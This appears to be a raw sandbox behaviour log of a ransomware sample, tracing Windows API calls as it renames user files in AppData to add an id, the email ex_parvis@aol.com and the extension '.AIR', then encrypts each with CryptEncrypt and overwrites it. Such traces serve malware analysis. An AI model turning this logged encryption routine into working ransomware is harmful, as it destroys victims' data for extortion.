	[0105.917] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3", dwFileAttributes=0x80) returned 1
	[0105.918] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3") returned 66
	[0105.918] GetProcessHeap () returned 0x540000
	[0105.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x57fb28
	[0105.918] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3"
	[0105.918] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.918] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fh9o_eymrd0hodv.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fh9o_eymrd0hodv.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.921] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\FH9o_eyMRD0hodV.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fh9o_eymrd0hodv.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.921] GetProcessHeap () returned 0x540000
	[0105.921] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0105.921] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=18323) returned 1
	[0105.921] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4793
	[0105.921] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.921] GetProcessHeap () returned 0x540000
	[0105.921] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.921] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.921] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.922] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.922] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.922] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x4793, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x4793, lpOverlapped=0x0) returned 1
	[0105.922] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-18323, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.923] WriteFile (in: hFile=0x50c, lpBuffer=0x60e358*, nNumberOfBytesToWrite=0x4793, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60e358*, lpNumberOfBytesWritten=0x3a1f778*=0x4793, lpOverlapped=0x0) returned 1
	[0105.923] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.923] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.923] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3", dwFileAttributes=0x80) returned 1
	[0105.923] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3") returned 56
	[0105.923] GetProcessHeap () returned 0x540000
	[0105.923] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x601bd0
	[0105.923] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3"
	[0105.923] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.924] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f94ql.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f94ql.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.926] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f94QL.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f94ql.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.926] GetProcessHeap () returned 0x540000
	[0105.927] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.927] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=47999) returned 1
	[0105.927] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xbb7f
	[0105.927] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.927] GetProcessHeap () returned 0x540000
	[0105.927] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.927] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.927] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.928] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.928] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.928] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xbb7f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xbb7f, lpOverlapped=0x0) returned 1
	[0105.929] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.929] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.929] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4", dwFileAttributes=0x80) returned 1
	[0105.929] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4") returned 60
	[0105.929] GetProcessHeap () returned 0x540000
	[0105.929] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x603bd0
	[0105.929] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4"
	[0105.929] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.929] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eyvvtuuha.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eyvvtuuha.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.932] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eYvvTuUHA.mp4.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eyvvtuuha.mp4.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.932] GetProcessHeap () returned 0x540000
	[0105.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.932] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=46744) returned 1
	[0105.932] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb698
	[0105.932] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.932] GetProcessHeap () returned 0x540000
	[0105.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.932] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.932] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.933] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.933] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.933] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xb698, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xb698, lpOverlapped=0x0) returned 1
	[0105.934] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-46744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.934] WriteFile (in: hFile=0x50c, lpBuffer=0x615258*, nNumberOfBytesToWrite=0xb698, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x615258*, lpNumberOfBytesWritten=0x3a1f778*=0xb698, lpOverlapped=0x0) returned 1
	[0105.934] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.934] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.934] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps", dwFileAttributes=0x80) returned 1
	[0105.934] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps") returned 58
	[0105.935] GetProcessHeap () returned 0x540000
	[0105.935] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x603bd0
	[0105.935] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps"
	[0105.935] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.935] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewgx3c4.pps"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewgx3c4.pps.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.937] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\eWgX3C4.pps.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewgx3c4.pps.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.937] GetProcessHeap () returned 0x540000
	[0105.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.937] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=57859) returned 1
	[0105.937] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xe203
	[0105.937] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.937] GetProcessHeap () returned 0x540000
	[0105.937] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.937] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.938] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.938] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.938] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.939] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xe203, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xe203, lpOverlapped=0x0) returned 1
	[0105.940] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.940] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.940] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi", dwFileAttributes=0x80) returned 1
	[0105.941] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi") returned 57
	[0105.941] GetProcessHeap () returned 0x540000
	[0105.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x601bd0
	[0105.941] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi"
	[0105.941] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.941] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxttq0.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxttq0.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.944] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dXTTQ0.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dxttq0.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.944] GetProcessHeap () returned 0x540000
	[0105.944] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.945] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=79537) returned 1
	[0105.945] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x136b1
	[0105.945] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.945] GetProcessHeap () returned 0x540000
	[0105.945] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.945] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.947] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.947] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.947] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.948] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x136b1, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x136b1, lpOverlapped=0x0) returned 1
	[0105.950] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.950] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.950] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg", dwFileAttributes=0x80) returned 1
	[0105.951] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg") returned 59
	[0105.951] GetProcessHeap () returned 0x540000
	[0105.951] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x603bd0
	[0105.951] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg"
	[0105.951] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.951] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b3nfbalv.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\B3NfBAlV.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b3nfbalv.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
